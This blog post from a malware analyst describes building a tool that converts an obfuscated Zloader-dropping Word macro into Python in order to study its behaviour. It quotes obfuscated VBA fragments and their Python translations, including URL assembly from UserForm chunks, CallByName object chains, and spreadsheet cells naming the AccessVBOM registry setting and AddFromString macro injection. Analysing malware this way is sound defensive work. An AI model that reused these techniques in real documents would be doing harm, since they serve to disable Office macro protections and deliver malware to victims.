In my previous blog we looked at a quite simple malicious VBA macro that used string-obfuscation and we could convert the code to Python to understand its real intentions. It wasn’t particularly complicated.
Today it will be a bit a lot more complicated. We will investigate a sample I’ve spent some time one previously, but with a different focus. Then we needed to understand how it worked. Now my focus is – what is needed to run this sample in a Python environment to see what it’s doing. The sample is not difficult to extract content from (MSHTML/OLE2), but..
In short, this sample runs a Word macro on document_close that will attempt to download an password-encrypted xls spreadsheet (without macros) but information in the cells, load it silent, access its properties and inject a new macro into Excel, run this and which then drops a DLL for Zloader into a svchost on the target machine. Robert Neumann and I did a nice writeup about the mechanics in a blog-post here last week.
Replicating this in Python is going to be messy, but let’s start. First of all, what do we need?
- We need the decompressed macro source-code for the Word document
- Lots of tools there that can do this, but you need to decompile the ActiveMime.
- We need the UserFormX information to populate variables in the code
- I wrote my own tool, but does something exist?
- We need to get the VBA macro code that starts with document_close to start and run in a Python world and download the xls, where we’ll need to:
- Decrypt the XLS with the password
- Extract the XF formulas and cell-informations to map what is where
- Build an object-oriented world that looks like VBA in Python
- Access to a “excel.application” object
- Access to sheets and cells (and control structures/API)
- Log what activity the sample performs
- Build a tool that creates all this automatically and generates the threat-intelligence you are after
Not a small order for a small blog, so let’s start. I envision 2 modules:
- A tool that reads an Office document (Word, Excel) and generates JSON data for:
- Excel, Word
- VBA source-code
- Just decompressed text
- UserFormX information
- Each UserForm has it’s on table of JSON objects
- Sheet/Cell/XF-information if Excel
- Each sheet & cell will have their own JSON object describing their area
- A second tool that loads the output from part 1, converts the code to Python with the rules from the JSON and starts execute on the global macro level. If downloads are required, it will spawn step 1 to generate new raw data for the new target which will be read into the Python universe
Where do we start attacking the Python world?
If we start looking at the c6() function in VBA, it looks like this:
Sub c6() UserForm2.ComboBox1.AddItem UserForm1.fb & UserForm1.af UserForm2.ComboBox1.ListIndex = 7 p8 = UserForm2.ComboBox24 Set m4 = CreateObject(UserForm2.ComboBox1) UserForm2.ComboBox1.ListIndex = 6 m4.DisplayAlerts = False hm = UserForm2.ComboBox3 End Sub
Making the object model, that an Application holds Sheets that again holds Cells will allow you to modify the code as little as possible. However, the constructor of UserForm1 needs to run exactly when it needs to – in this case, it’s on the first line of c6. That means that the Python version of this section will look a lot like this:
def c6(self): global UserForm1 UserForm1 = _UserForm1() UserForm2.ComboBox1.AddItem (UserForm1.fb & UserForm1.af) UserForm2.ComboBox1.ListIndex = 7 self.p8 = UserForm2.ComboBox24 self.m4 = CreateObject(UserForm2.ComboBox1) UserForm2.ComboBox1.ListIndex = 6 self.m4.DisplayAlerts = False self.hm = UserForm2.ComboBox3
When you generate the Python you need to understand the flow and see when the object is first accessed to thereby create the constructor at the right time. Some of the variables (p3, m4 etc) are variables from the various UserForms, many which are initialized to “” but others to real values you need (like the URL and some very important strings). As an example of the UserForm data you need to extract and feed the __init__ of the UserForm class itself:
UserForm2,13,ComboBox13,wF UserForm2,12,ComboBox12,ni UserForm2,11,ComboBox11,oz UserForm2,10,ComboBox10,ta UserForm2,9,ComboBox9,CR UserForm2,8,ComboBox8,// UserForm2,7,ComboBox7,VA UserForm2,6,ComboBox6,s: UserForm2,5,ComboBox5,KJ UserForm2,4,ComboBox4,tp UserForm2,3,ComboBox3,mAL UserForm2,2,ComboBox2,ht UserForm2,1,ComboBox1,EMPTY UserForm3,1,ComboBox1,EMPTY UserForm1,18,syh,pp UserForm1,17,kk,En UserForm1,16,ir,EMPTY UserForm1,15,wgf,EMPTY UserForm1,14,ib,visi
As you can see, it’s just an ID of what UserForm (1..5), what index it will have, the identifier the code will use to reach it and the initial value of it.
When we get into the constructor and it wants to generate the URL for the download it will run VBA code like this:
Set f5 = UserForm2.Controls n6 = f5.Count - 1 qj = "" For ej = 1 To n6 qj = qj & f5.Item(ej) ej = ej + 1 Next ComboBox1.AddItem "f9" ComboBox1.AddItem "pw" ComboBox1.AddItem "ujk" ComboBox1.AddItem "rt" ComboBox1.AddItem "l2" ComboBox1.AddItem "ku" ComboBox1.AddItem qj
which if we convert it to a Python world would look like this:
f5 = self.Controls n6 = f5.Count - 1 qj = "" # step 2 is to counter for ej = ej + 1 for ej in range(1,n6,2): qj = qj + f5.Item(ej) # ej = ej + 1 self.ComboBox1.AddItem ("f9") self.ComboBox1.AddItem ("pw") self.ComboBox1.AddItem ("ujk") self.ComboBox1.AddItem ("rt") self.ComboBox1.AddItem ("l2") self.ComboBox1.AddItem ("ku") self.ComboBox1.AddItem (qj)
Basically the object-model you create must allow the UserForm2 object to contain a Controls class which you can iterate through Items. The last key part is the sequence of AddItems – the UserForm2.ComboBox1 class will have an array of entries, and here it will “push” 6 values before the URL (qj) is added. It will later modify the UserForm2.ComboBox1.ListIndex to 7 to access the URL.
One aspect is the use of “On Error Resume Next” which this sample misuses quite a bit. This just mean, if you encounter an error, go to the next instruction. However, you need to consider how VBA handles instructions. The easier parts are instructions like this:
xm = j6 qu = o0 self.mk = q1 fx = z8i
Neither j6, o0, q1 or z81 is defined and will cause an error – but it’s easy to capture having a try/except around each logical unit (remember this will be computer generated, not done by a human):
try: gc = hv except Exception: pass
You can’t just wrap it all in a try/except as you need to resume on the next logical instruction.
The harder part of the exception-trick is when the download is complete and it should break out of the loop setting the timer to rerun the macro at intervals. It invokes ErrHandler which breaks out of the If statement.
So you need to understand code well to port it to Python.
You will see that the “Python VBA” code will create an object excel.application, try to OpEn it on the given URL and the given password.
So now the Python code needs to get it, run it through the first tool to generate the JSON data for the sheet/cell/XF (I cheat now and use CSV). If we look at the UserForm data, I export it currently just as a CSV like this:
.. 3,Sheet1,40,17,"Quit" 3,Sheet1,26,0,"VBComponents" 2,Sheet2,46,128,"REG_DWORD" 2,Sheet2,40,94,"\Excel\Security\AccessVBOM" 2,Sheet2,13,83,"1.000000" 3,Sheet1,31,30,"ThisWorkbook.gykvtla" 3,Sheet1,12,30,"Add" 3,Sheet1,9,4,"AddFromString" 2,Sheet2,12,43,"CountOfLines" 2,Sheet2,49,40,"CodeModule" ..
If we look at line one, it means sheet 3, named “sheet1”, row 18 (17+1), column 40 (AO) with the value “Quit”. You absolutely need this information to make the code run correctly. To make matters harder, you also need to follow Excel Formula statements, where for instance, a cell is set to be equal to the content of another cell, like
Basically the module that generate the cell-info will need to deal with this.
Building the macro on Excel from Word
Later in the macro code of Word, when it built an object to access the Excel spreadsheet object (self.m4), it runs the following VBA code:
While fp jq = Sh1.Cells(lu, 1).Value If Len(jq) < 1 Then fp = False Else hp = hp & jq End If lu = lu + 1 Wend vme = CallByName(m4, vu, 2) UserForm1.pb.Value = bp & vme & fd UserForm1.gk.Value = lg CallByName CreateObject(ab), it, 1, UserForm1.pb, nk, UserForm1.gk Set sdx = CreateObject(pc) Set a8 = CallByName(sdx, r9, 2) Set i8 = CallByName(a8, rq, 1) Set gc = CallByName(sdx, gc, 2)
In my Python world this corresponds to this code:
while fp: jq = Sh1.Cells(lu, 1).Value if len(jq) < 1: fp = False else: self.hp = self.hp + jq lu = lu + 1 vme = CallByName(self.m4, vu, 2) UserForm1.pb.Value = bp + vme + fd UserForm1.gk.Value = lg CallByName (CreateObject(ab), it, 1, UserForm1.pb, nk, UserForm1.gk) sdx = CreateObject(pc) a8 = CallByName(sdx, r9, 2) i8 = CallByName(a8, rq, 1) self.gc = CallByName(sdx, self.gc, 2)
I try to make as little change to the VBA code as possible. From the UserForm input-data you know what is a “global” or what is a variable for what module.
At the end, you end up with the output of what this would to to execute the macro in Excel:
I’m not saying this is particularly easy to do, but it’s a start. Still some work left, the objects returned by CallByName needs to be created and add value to really follow the flow. Next time I hope to “run” the remote macro in “Excel” as well to see if we can drop that DLL too… I think its quite a bit of progress for a day or 2 of work.
Stay tuned for more VBA2Python, which is the tool that I’m trying to creating to solve this problem. It’s definitely a challenge, but you learn new things every day and improve.